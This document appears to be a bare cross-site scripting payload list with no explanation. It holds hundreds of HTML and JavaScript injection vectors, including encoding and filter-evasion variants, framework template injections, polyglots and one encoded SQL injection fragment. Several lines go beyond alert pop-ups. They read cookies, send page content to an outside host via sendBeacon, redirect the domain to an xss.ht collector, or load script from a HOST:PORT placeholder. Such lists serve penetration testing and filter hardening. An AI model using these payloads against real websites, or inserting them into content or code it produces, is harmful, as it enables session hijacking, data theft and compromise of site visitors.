<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<Video> <source onerror = "javascript: alert (XSS)">
(A(%22onerror='alert%601%60'testabcd))/
<applet code="javascript:confirm(document.cookie);">
<isindex x="javascript:" onmouseover="alert(XSS)">
"><img src="x:x" onerror="alert(XSS)">
<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'>
<style>//*{x:expression(alert(/xss/))}//<style></style>
<img src="/" =_=" title="onerror='prompt(1)'">
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe
<script x> alert(1) </script 1=2
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
<form><button formaction=javascript&colon;alert(1)>CLICKME
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
a=alert,a(1)
[1].find(alert)
top[“al”+”ert”](1)
top[‘al\x65rt’](1)
top[8680439..toString(30)](1)
<button onClick="alert('xss')">Submit</button>
<svg><animate onend=alert(1) attributeName=x dur=1s>
<audio src/onerror=alert(1)>
<a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
<script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>
<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script>
<iframe srcdoc=&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;></iframe>
<iframe src="javascript:'&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;'"></iframe>
<img src=x onerror=location=atob`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21haW4p`>
<script>onerror=alert;throw 1</script>
<script>{onerror=alert}throw 1</script>
<script>throw onerror=alert,1</script>
<script>throw onerror=eval,e=new Error,e.message='alert\x281\x29',e</script>
<script>throw onerror=Uncaught=eval,e=new Error,e.message='/*'+location.hash,!!window.InstallTrigger?e:e.message</script>
<script>throw/x/,onerror=Uncaught=eval,h=location.hash,e=Error,e.lineNumber=e.columnNumber=e.fileName=e.message=h[2]+h[1]+h,!!window.InstallTrigger?e:e.message</script>
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
<script>location='javascript:alert\x281\x29'</script>
<script>location=name</script>
<script>alert`1`</script>
<script>throw[onerror]=[alert],1</script>
<script>var{haha:onerror=alert}=0;throw 1</script>
<script>new Function`X${document.location.hash.substr`1`}`</script>
<script>Function`X${document.location.hash.substr`1`}```</script>
<script>var{a:onerror}={a:alert};throw 1</script>
blah(""+new class b{toString=e=>location=name}+"")</script>
<xss class=progress-bar-animated onanimationstart=alert(1)>
<script>import('data:text/javascript,alert(1)')</script>
<xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss>
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
<iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>
<a href="&#X6A;avascript:alert(1)">XSS</a>
<a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>
<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>
<script>\u0061lert(1)</script>
<script>\u{61}lert(1)</script>
<script>eval('\x61lert(1)')</script>
<a href="&#0000106avascript:alert(1)">XSS</a>
<a href="&#x6a;avascript:alert(1)">XSS</a>
≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># ≋
%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74
">'><details/open/ontoggle=confirm('XSS')>
<input type="hidden" value="mypayload" /> %22%20autofocus%20onfocus%3d(confirm)(1)%2f%2f
%22%20autofocus%20onfocus%00%3d(confirm)(1)%2f%2f
javascript:new%20Function`al\ert\`1\``;
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
&lt;script&gt;alert(1)&lt;/script&gt;
&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;
&amp;amp;lt;script&amp;amp;gt;alert(1)&amp;amp;lt;/script&amp;amp;gt;
&amp;amp;amp;lt;script&amp;amp;amp;gt;alert(1)&amp;amp;amp;lt;/script&amp;amp;amp;gt;
&amp;amp;amp;amp;lt;script&amp;amp;amp;amp;gt;alert(1)&amp;amp;amp;amp;lt;/script&amp;amp;amp;amp;gt;
&lt;img src=1 onerror=alert(1)&gt;
&amp;lt;img src=1 onerror=alert(1)&amp;gt;
&amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;gt;
&amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;gt;
&amp;amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;amp;gt;
"&lt;img src=1 onerror=alert(1)&gt;
"&amp;lt;img src=1 onerror=alert(1)&amp;gt;
"&amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;gt;
"&amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;gt;
"&amp;amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;amp;gt;
"&gt;&lt;img src=x onerror=prompt(document.domain);&gt;
"&amp;gt;&amp;lt;img src=x onerror=prompt(document.domain);&amp;gt;
"&amp;amp;gt;&amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;gt;
"&amp;amp;amp;gt;&amp;amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;amp;gt;
"&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;amp;amp;gt;
"&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;amp;amp;amp;gt;
”&gt;&lt;svg onload=alert&amp;#0000000040"1")&gt;
”&amp;gt;&amp;lt;svg onload=alert&amp;amp;#0000000040"1")&amp;gt;
”&amp;amp;gt;&amp;amp;lt;svg onload=alert&amp;amp;amp;#0000000040"1")&amp;amp;gt;
”&amp;amp;amp;gt;&amp;amp;amp;lt;svg onload=alert&amp;amp;amp;amp;#0000000040"1")&amp;amp;amp;gt;
”&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;svg onload=alert&amp;amp;amp;amp;amp;#0000000040"1")&amp;amp;amp;amp;gt;
"&gt;&lt;svg onload=alert(1)&gt;
"&amp;gt;&amp;lt;svg onload=alert(1)&amp;gt;
"&amp;amp;gt;&amp;amp;lt;svg onload=alert(1)&amp;amp;gt;
"&amp;amp;amp;gt;&amp;amp;amp;lt;svg onload=alert(1)&amp;amp;amp;gt;
"&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;svg onload=alert(1)&amp;amp;amp;amp;gt;
&lt;img/src/onerror=alert(`ibro`)&gt;
&amp;lt;img/src/onerror=alert(`ibro`)&amp;gt;
&amp;amp;lt;img/src/onerror=alert(`ibro`)&amp;amp;gt;
&amp;amp;amp;lt;img/src/onerror=alert(`ibro`)&amp;amp;amp;gt;
&amp;amp;amp;amp;lt;img/src/onerror=alert(`ibro`)&amp;amp;amp;amp;gt;
javascript:\/\/\'\/<\/title><\/style><\/textarea><\/script>--><p%22%20%0D%20%0A%20onclick%3Dalert(123)%2F%2F%3E*%2Falert()%2F*%3Cimg%20src%3Dx%20onerror%3Dalert(456)%2F%3E%3Csvg%2Fonload%3Dprompt(789)%2F%3E%3B\'%22%2F%2F%20%3A%3Bfn()%3B%0A%0D%0A%0D%0A%0D%0A%09{{12*12+\'Audi%20RS5\'.substr(0,4)}}XXX%3Cscript%3Ealert(\'XSS\')
javascript:\\\/\\\/\\\'\\\/<\\\/title><\\\/style><\\\/textarea><\\\/script>--><p%22%20%0D%20%0A%20onclick%3Dalert(123)%2F%2F%3E*%2Falert()%2F*%3Cimg%20src%3Dx%20onerror%3Dalert(456)%2F%3E%3Csvg%2Fonload%3Dprompt(789)%2F%3E%3B\\\'%22%2F%2F%20%3A%3Bfn()%3B%0A%0D%0A%0D%0A%0D%0A%09{{12*12+\\\'Audi%20RS5\\\'.substr(0,4)}}XXX%3Cscript%3Ealert(\\\'XSS\\\')
javascript:\\\\\\\/\\\\\\\/\\\\\\\'\\\\\\\/<\\\\\\\/title><\\\\\\\/style><\\\\\\\/textarea><\\\\\\\/script>--><p%22%20%0D%20%0A%20onclick%3Dalert(123)%2F%2F%3E*%2Falert()%2F*%3Cimg%20src%3Dx%20onerror%3Dalert(456)%2F%3E%3Csvg%2Fonload%3Dprompt(789)%2F%3E%3B\\\\\\\'%22%2F%2F%20%3A%3Bfn()%3B%0A%0D%0A%0D%0A%0D%0A%09{{12*12+\\\\\\\'Audi%20RS5\\\\\\\'.substr(0,4)}}XXX%3Cscript%3Ealert(\\\\\\\'XSS\\\\\\\')
javascript:\/\/%250Aalert(1)
javascript:\\\/\\\/%250Aalert(1)
javascript:\\\\\\\/\\\\\\\/%250Aalert(1)
javascript:\\\\\\\\\\\\\\\/\\\\\\\\\\\\\\\/%250Aalert(1)
jaVasCript:\/*-\/*`\/*\\`\/*\'\/*\"\/**\/(\/* *\/oNcliCk=alert() )\/\/%0D%0A%0D%0A\/\/<\/stYle\/<\/titLe\/<\/teXtarEa\/<\/scRipt\/--!>\\x3csVg\/<sVg\/oNloAd=alert()\/\/>\\x3e
jaVasCript:\\\/*-\\\/*`\\\/*\\\\`\\\/*\\\'\\\/*\\\"\\\/**\\\/(\\\/* *\\\/oNcliCk=alert() )\\\/\\\/%0D%0A%0D%0A\\\/\\\/<\\\/stYle\\\/<\\\/titLe\\\/<\\\/teXtarEa\\\/<\\\/scRipt\\\/--!>\\\\x3csVg\\\/<sVg\\\/oNloAd=alert()\\\/\\\/>\\\\x3e
jaVasCript:\\\\\\\/*-\\\\\\\/*`\\\\\\\/*\\\\\\\\`\\\\\\\/*\\\\\\\'\\\\\\\/*\\\\\\\"\\\\\\\/**\\\\\\\/(\\\\\\\/* *\\\\\\\/oNcliCk=alert() )\\\\\\\/\\\\\\\/%0D%0A%0D%0A\\\\\\\/\\\\\\\/<\\\\\\\/stYle\\\\\\\/<\\\\\\\/titLe\\\\\\\/<\\\\\\\/teXtarEa\\\\\\\/<\\\\\\\/scRipt\\\\\\\/--!>\\\\\\\\x3csVg\\\\\\\/<sVg\\\\\\\/oNloAd=alert()\\\\\\\/\\\\\\\/>\\\\\\\\x3e
window['alert']()
this['alert']()
(alert)()
eval(atob('YWxlcnQoKQ=='))
document['cookie']
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>
<input onauxclick=alert(1)>
<video onfullscreenchange=alert(1) src=validvideo.mp4 controls>
<input oninput=alert(1) value=xss>
<xss onkeypress="alert(1)" contenteditable style=display:block>test</xss>
<a onpaste="alert(1)" contenteditable>test</a>
%EF%BC%9Cscript%EF%BC%9E alert() %EF%BC%9C/script%EF%BC%9E
%EF%BC%9Cscript%EF%BC%9Ealert()%EF%BC%9C/script%EF%BC%9E
%EF%BC%9Cimg%20src%3Dxxx%20onerror%3Dalert(1)%EF%BC%9E
%3Cimg%20src=xx%20onerror=alert(1)%3E
<xss onafterscriptexecute=alert(1)><script>1</script>
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss>
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>
<body onbeforeprint=console.log(1)>
<xss onbeforescriptexecute=alert(1)><script>1</script>
<body onbeforeunload=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)>
<audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
<audio controls ondurationchange=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>
<a id=x tabindex=1 onfocus=alert(1)></a>
<acronym id=x tabindex=1 onfocus=alert(1)></acronym>
<address id=x tabindex=1 onfocus=alert(1)></address>
<applet id=x tabindex=1 onfocus=alert(1)></applet>
<img usemap=#x><map name="x"><area href onfocus=alert(1) id=x>
<button autofocus onfocus=alert(1)>test</button>
<data id=x tabindex=1 onfocus=alert(1)></data>
<footer id=x tabindex=1 onfocus=alert(1)></footer>
<form id=x tabindex=1 onfocus=alert(1)></form>
<frameset><frame id=x onfocus=alert(1)>
<head id=x tabindex=1 onfocus=alert(1) style=display:block></head>
<img id=x tabindex=1 onfocus=alert(1)></img>
<image id=x tabindex=1 onfocus=alert(1)></image>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
<audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav" type="audio/wav"></audio>
<body onmessage=print()>
<body onresize="print()">
<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
<details ontoggle=alert(1) open>test</details>
<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
<xss draggable="true" ondragleave="alert(1)" style=display:block>test</xss>
<body onpageshow=alert(1)>
<body onpopstate=print()>
<audio controls onprogress=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>
<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />
<xss onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><span id=x>test</span></xss>
<noembed><img title="</noembed><img src onerror=alert(1)>"></noembed>
<style><img title="</style><img src onerror=alert(1)>"></style>
<textarea><img title="</textarea><img src onerror=alert(1)>"></textarea>
<title><img title="</title><img src onerror=alert(1)>"></title>
<noscript><img title="</noscript><img src onerror=alert(1)>"></noscript>
<noframes><img title="</noframes><img src onerror=alert(1)>"></noframes>
<iframe><img title="</iframe><img src onerror=alert(1)>"></iframe>
<xmp><img title="</xmp><img src onerror=alert(1)>"></xmp>
{{_s.constructor('alert(1)')()}}
#{{_s.constructor('alert(1)')()}}
<p v-show="_c.constructor`alert(1)`()">
<x v-on:click='_b.constructor`alert(1)`()'>click</x>
<x :[_b.constructor`alert(1)`()]>
<p :=_c.constructor`alert(1)`()>
<x @click='_b.constructor`alert(1)`()'>click</x>
<x title"="&lt;iframe&Tab;onload&Tab;=alert(1)&gt;">
<x title"="&lt;iframe&Tab;onload&Tab;=setTimeout(/alert(1)/.source)&gt;">
{{$el.innerHTML='\u003cimg src onerror=alert(1)\u003e'}}
\u003cimg src onerror=alert(1)\u003e
"><image/src/onerror=prompt("ibrahimxss")>
"><ImG%20sRc=x%20onErroR=prompt`ibrahimxss`>
';alert("ibrahimxss");//
“>-setTimeout`\u0028alert(1)\u0029`-’
</option><img src=x onerror=alert(origin)>
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()>
javascript:74163166147401571561541571411447514115414516216450615176
%22%3EEnter_Mouse_Pointer_Here_to_get_XSS%3C%5K/onpointerenter=alert(location)%3E%3!
<img src=”invalid-image” onerror=”alert(document.cookie)”>
"{text:<img/src=x onload=confirm(1)>}"
{text:<img/src=x onload=confirm(1)>}
%7b%0a%20%20%22%64%61%74%61%22%3a%20%22%7b%74%65%78%74%3a%3c%69%6d%67%2f%73%72%63%3d%78%20%6f%6e%6c%6f%61%64%3d%63%6f%6e%66%69%72%6d%28%31%29%3e%7d%22%2c%0a%20%20%22%65%76%65%6e%74%49%44%22%3a%20%32%33%34%32%33%0a%7d
“autofocus onclick=’alert()
“autofocus onclick=’&#97;lert()’
ibrahimxss“autofocus onclick=’&#97;lert()’
<​script type="text/javascript">javascript​:alert(1);<​/script>
“><script>alert(1);</script>
"><img/src=x/onerro=6><img/src="1"/onerror=alert(1);>?test=test
"><img/src=x/onerro=6><img/src="1"/onerror=alert(1);>
<img/src=x/onerro=6><img/src="1"/onerror=alert(1);>?test=test
"><img/src=x/onerro=6><img/src="1"/onerror=import(location.search.split("aa=").pop());>
%22%3E%3Cimg/src=x/onerro=6%3E%3Cimg/src=%221%22/onerror=alert(1);%3E1
<svg@load=this.alert(1)>
<img src @error=this.alert(1)>
(Z("onerror="a=print,a`1`"))
(Z("onerror="a=console,a.log`${cookie}`"))
<img  sr%00c=x o%00nerror=((pro%00mpt(1)))>
<img src @error=e=$event.composedPath().pop().alert(1)>
{{_toDisplayString.constructor('alert(1)')()}}
<teleport to=script:nth-child(2)>alert&lpar;1&rpar;</teleport></div><script></script>
<component is=script text=alert(1)>
<x @click=$event.view.alert(1)>click</x>
<x v-bind:a='_b.constructor`alert(1)`()'>
<a @['c\lic\u{6b}']="_c.constructor('alert(1)')()">test</a>
<img src @error=e=$event.path.pop().alert(1)>
{{_openBlock.constructor('alert(1)')()}}
#{{_openBlock.constructor('alert(1)')()}}
{{_Vue.h.constructor`alert(1)`()}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
{{{}.")));alert(1)//"}}
{{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )));}}
{}.")));alert(1)//";
'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
xss'''><iframe srcdoc='%26it;script>;prompt` ${document.domain}`%26it;/script>'>
["');alert('xss');//"]@xyz.xxx
<c/onpointerrawupdate=d=document,b=%27%60%27,d[%27loca%27%2B%27tion%27]=%27javascript%26colon;aler%27%2B%27t%27%2Bb%2Bdomain%2Bb>
<svg/onload=location/**/='http://GH0ST.xss.ht/'+document.dom 
autofocus ' onfocus='alert(document.domain)'
"autofocus onfocus='alert(document.domain)'
"><svg+onload=alert&amp;#x00"1
"><svg+onload=alert&amp;#x01"1
"><svg+onload=alert&amp;#x02"1
"><svg+onload=alert&amp;#x03"1
"><svg+onload=alert&amp;#x04"1
"><svg+onload=alert&amp;#x05"1
"><svg+onload=alert&amp;#x06"1
"><svg+onload=alert&amp;#x07"1
"><svg+onload=alert&amp;#x08"1
"><svg+onload=alert&amp;#x09"1
"><svg+onload=alert&amp;#x0A"1
"><svg+onload=alert&amp;#x0B"1
"><svg+onload=alert&amp;#x0C"1
"><svg+onload=alert&amp;#x0D"1
"><svg+onload=alert&amp;#x0E"1
"><svg+onload=alert&amp;#x0F"1
"><svg+onload=alert&amp;#x10"1
"><svg+onload=alert&amp;#x11"1
"><svg+onload=alert&amp;#x12"1
"><svg+onload=alert&amp;#x13"1
"><svg+onload=alert&amp;#x14"1
"><svg+onload=alert&amp;#x15"1
"><svg+onload=alert&amp;#x16"1
"><svg+onload=alert&amp;#x17"1
"><svg+onload=alert&amp;#x18"1
"><svg+onload=alert&amp;#x19"1
"><svg+onload=alert&amp;#x1A"1
"><svg+onload=alert&amp;#x1B"1
"><svg+onload=alert&amp;#x1C"1
"><svg+onload=alert&amp;#x1D"1
"><svg+onload=alert&amp;#x1E"1
"><svg+onload=alert&amp;#x1F"1
"><svg+onload=alert&amp;#x20"1
"><svg+onload=alert&amp;#x21"1
"><svg+onload=alert&amp;#x22"1
"><svg+onload=alert&amp;#x23"1
"><svg+onload=alert&amp;#x24"1
"><svg+onload=alert&amp;#x25"1
"><svg+onload=alert&amp;#x26"1
"><svg+onload=alert&amp;#x27"1
"><svg+onload=alert&amp;#x28"1
"><svg+onload=alert&amp;#x29"1
"><svg+onload=alert&amp;#x2A"1
"><svg+onload=alert&amp;#x2B"1
"><svg+onload=alert&amp;#x2C"1
"><svg+onload=alert&amp;#x2D"1
"><svg+onload=alert&amp;#x2E"1
"><svg+onload=alert&amp;#x2F"1
"><svg+onload=alert&amp;#x30"1
"><svg+onload=alert&amp;#x31"1
"><svg+onload=alert&amp;#x32"1
"><svg+onload=alert&amp;#x30"1
"><svg+onload=alert&amp;#x31"1
"><svg+onload=alert&amp;#x32"1
"><svg+onload=alert&amp;#x33"1
"><svg+onload=alert&amp;#x34"1
"><svg+onload=alert&amp;#x35"1
"><svg+onload=alert&amp;#x36"1
"><svg+onload=alert&amp;#x37"1
"><svg+onload=alert&amp;#x38"1
"><svg+onload=alert&amp;#x39"1
"><svg+onload=alert&amp;#x41"1
"><svg+onload=alert&amp;#x42"1
"><svg+onload=alert&amp;#x43"1
"><svg+onload=alert&amp;#x44"1
"><svg+onload=alert&amp;#x45"1
"><svg+onload=alert&amp;#x46"1
"><svg+onload=alert&amp;#x47"1
"><svg+onload=alert&amp;#x48"1
"><svg+onload=alert&amp;#x49"1
"><svg+onload=alert&amp;#x4A"1
"><svg+onload=alert&amp;#x4B"1
"><svg+onload=alert&amp;#x4C"1
"><svg+onload=alert&amp;#x4D"1
"><svg+onload=alert&amp;#x4E"1
"><svg+onload=alert&amp;#x4F"1
"><svg+onload=alert&amp;#x50"1
"><svg+onload=alert&amp;#x51"1
"><svg+onload=alert&amp;#x52"1
"><svg+onload=alert&amp;#x53"1
"><svg+onload=alert&amp;#x54"1
"><svg+onload=alert&amp;#x55"1
"><svg+onload=alert&amp;#x56"1
"><svg+onload=alert&amp;#x57"1
"><svg+onload=alert&amp;#x58"1
"><svg+onload=alert&amp;#x59"1
"><svg+onload=alert&amp;#x5A"1
"><svg+onload=alert&amp;#x5B"1
"><svg+onload=alert&amp;#x5C"1
"><svg+onload=alert&amp;#x5D"1
"><svg+onload=alert&amp;#x5E"1
"><svg+onload=alert&amp;#x5F"1
"><svg+onload=alert&amp;#x60"1
"><svg+onload=alert&amp;#x61"1
"><svg+onload=alert&amp;#x62"1
"><svg+onload=alert&amp;#x63"1
"><svg+onload=alert&amp;#x64"1
"><svg+onload=alert&amp;#x65"1
"><svg+onload=alert&amp;#x66"1
"><svg+onload=alert&amp;#x67"1
"><svg+onload=alert&amp;#x68"1
"><svg+onload=alert&amp;#x69"1
"><svg+onload=alert&amp;#x6A"1
"><svg+onload=alert&amp;#x6B"1
"><svg+onload=alert&amp;#x6C"1
"><svg+onload=alert&amp;#x6D"1
"><svg+onload=alert&amp;#x6E"1
"><svg+onload=alert&amp;#x6F"1
"><svg+onload=alert&amp;#x70"1
"><svg+onload=alert&amp;#x71"1
"><svg+onload=alert&amp;#x72"1
"><svg+onload=alert&amp;#x73"1
"><svg+onload=alert&amp;#x74"1
"><svg+onload=alert&amp;#x75"1
"><svg+onload=alert&amp;#x76"1
"><svg+onload=alert&amp;#x77"1
"><svg+onload=alert&amp;#x78"1
"><svg+onload=alert&amp;#x79"1
"><svg+onload=alert&amp;#x7A"1
"><svg+onload=alert&amp;#x7B"1
"><svg+onload=alert&amp;#x7C"1
"><svg+onload=alert&amp;#x7D"1
"><svg+onload=alert&amp;#x7E"1
"><svg+onload=alert&amp;#x7F"1
"><svg+onload=alert&amp;#x80"1
"><svg+onload=alert&amp;#x81"1
"><svg+onload=alert&amp;#x82"1
"><svg+onload=alert&amp;#x83"1
"><svg+onload=alert&amp;#x84"1
"><svg+onload=alert&amp;#x85"1
"><svg+onload=alert&amp;#x86"1
"><svg+onload=alert&amp;#x87"1
"><svg+onload=alert&amp;#x88"1
"><svg+onload=alert&amp;#x89"1
"><svg+onload=alert&amp;#x8A"1
"><svg+onload=alert&amp;#x8B"1
"><svg+onload=alert&amp;#x8C"1
"><svg+onload=alert&amp;#x8D"1
"><svg+onload=alert&amp;#x8E"1
"><svg+onload=alert&amp;#x8F"1
"><svg+onload=alert&amp;#x90"1
"><svg+onload=alert&amp;#x91"1
"><svg+onload=alert&amp;#x92"1
"><svg+onload=alert&amp;#x93"1
"><svg+onload=alert&amp;#x94"1
"><svg+onload=alert&amp;#x95"1
"><svg+onload=alert&amp;#x96"1
"><svg+onload=alert&amp;#x97"1
"><svg+onload=alert&amp;#x98"1
"><svg+onload=alert&amp;#x99"1
"><svg+onload=alert&amp;#x107"1
"><svg+onload=alert&amp;#x9A"1
<x onxxx=alert(1) 1='
"><img src=x onerror=prompt&#x000000028;document&#x00000002E;domain&#x000000029;&#x00000003B;>
<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
<script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<event-source src=javascript:alert(1)>
<iMg onerror=alert(1) src=a>
<[%00]img onerror=alert(1) src=a>
<i[%00]mg onerror=alert(1) src=a>
<img[%09]onerror=alert(1) src=a>
<img[%0a]onerror=alert(1) src=a>
<img/’onerror=alert(1) src=a>
<img/anyjunk/onerror=alert(1) src=a>
<img o[%00]nerror=alert(1) src=a>
<img onerror=a[%00]lert(1) src=a>
<img onerror=a&#x6c;ert(1) src=a>
<iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;1&#x29;>
<img onerror=a&#x06c;ert(1) src=a>
<img onerror=a&#x006c;ert(1) src=a>
<img onerror=a&#108;ert(1) src=a>
<img onerror=a&#108ert(1) src=a>
<img onerror=a&#0108ert(1) src=a>
<img onerror=eval(‘al&#x5c;u0065rt(1)’)src=a>
<imgonerror=&#x65;&#x76;&#x61;&#x6c;&#x28;&#x27;al&#x5c;u0065rt&#x28;1& #x29;&#x27;&#x29; src=a
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>
"><img src=1 onerror=alert(1)>.gif
";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)><svg/onload=p...
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt'](1)/*\*/ }, 5000);"></inpuT%3E;
<image/src/onerror=prompt(8)>
<img/src/onerror=prompt(8)>
<image src/onerror=prompt(8)>
<img src/onerror=prompt(8)>
<image src =q onerror=prompt(8)>
<img src =q onerror=prompt(8)>
</scrip</script>t><img src =q onerror=prompt(8)>
<svg onload=alert(1)>
"><svg onload=alert(1)//
"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//
'-alert(1)//
1"--></script><svg/onload=';alert(document.domain);'>
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
'">><marquee><img src=x onerror=confirm(1)></marquee>"><... formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
